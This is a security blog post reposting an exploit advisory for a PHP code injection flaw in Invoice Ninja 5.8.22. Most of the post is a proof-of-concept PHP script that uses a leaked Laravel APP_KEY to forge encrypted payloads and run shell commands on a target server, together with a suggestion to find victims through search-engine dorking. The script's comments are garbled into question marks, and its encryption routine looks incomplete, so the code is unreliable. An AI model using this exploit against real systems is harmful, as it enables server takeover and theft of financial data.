Latest Tech

Latest Posts

Invoice Ninja 5.8.22 PHP Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 125
Invoice Ninja 5.8.22 PHP Code Injection
Invoice Ninja 5.8.22 PHP Code Injection
Invoice Ninja version 5.8.22 contained a critical PHP Code Injection Invoice Ninja version 5.8.22 contained a critical PHP Code Injection vulnerability. This flaw allowed an authenticated attacker to execute arbitrary PHP code on the server.

The vulnerability stemmed from insufficient input validation and sanitization. Specifically, certain user-controlled inputs were processed in a way that permitted the injection of malicious PHP code.

Successful exploitation could lead to full compromise of the Invoice Ninja application. This includes unauthorized access to sensitive financial data, database manipulation, and potential control over the underlying server.

This severe vulnerability posed a significant risk to data integrity and system security. Users were strongly advised to update to a patched version to remediate this issue, as the fix addressed the inadequate input handling.

=============================================================================================================================================
| # Title : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://invoiceninja.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.

(Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .

[+] save code as poc.php.

[+] line 85 set target.

[+] Usage = php poc.php

[+] PayLoad :

<?php

// ????? ?????? ???? ????? ?????
function execute_command($url, $command, $app_key) {
$cipher_mode = 'AES-256-CBC';

// ????? ????? GET ??? ???? ???????
$response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');

if ($response['code'] != 200) {
die("?? ???? ??????? ????? ?? ?????.");
}

// ?? ??????? ???????? APP_KEY
$xsrf_token = extract_xsrf_token($response['cookies']);
if (!$xsrf_token) {
die("?? ??? ?????? ??? XSRF-TOKEN.");
}

$decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
if (!$decrypted_value) {
die("?? ??????? ???????? APP_KEY ???.");
}

echo "APP_KEY ????: " . $app_key . "\n";
echo "?????? ????????: " . $decrypted_value . "\n";

// ????? ??????? ???????
$payload = base64_encode($command); // ?????? ?? payload ????? ??
$encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);

if (!$encrypted_payload) {
die("??? ??????? ???????? Laravel.");
}

// ????? ?????
send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
}

// ???? ????? ?????
function send_request($url, $method, $content_type, $endpoint) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: ' . $content_type
]);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);

curl_close($ch);

return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
}

// ???? ??????? XSRF-TOKEN ?? ???????
function extract_xsrf_token($cookies) {
foreach ($cookies as $cookie) {
if (strpos($cookie, 'XSRF-TOKEN') !== false) {
preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
return $matches[1];
}
}
return null;
}

// ???? ?? ???????
function laravel_decrypt($ciphertext, $key, $cipher_mode) {
// ??? ???? ??????? ???????? AES ??? ???????
// ?????? ????? OpenSSL ?? PHP ???? ?????
return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// ???? ???????
function laravel_encrypt($plaintext, $key, $cipher_mode) {
// ?????? ????? OpenSSL ?? PHP ???????
return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// ??????? ??????? ?? ????? ????????
$url = "https://target.com";
$app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
$command = "ls -la"; // ?????? ?????? ???????
execute_command($url, $command, $app_key);

?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.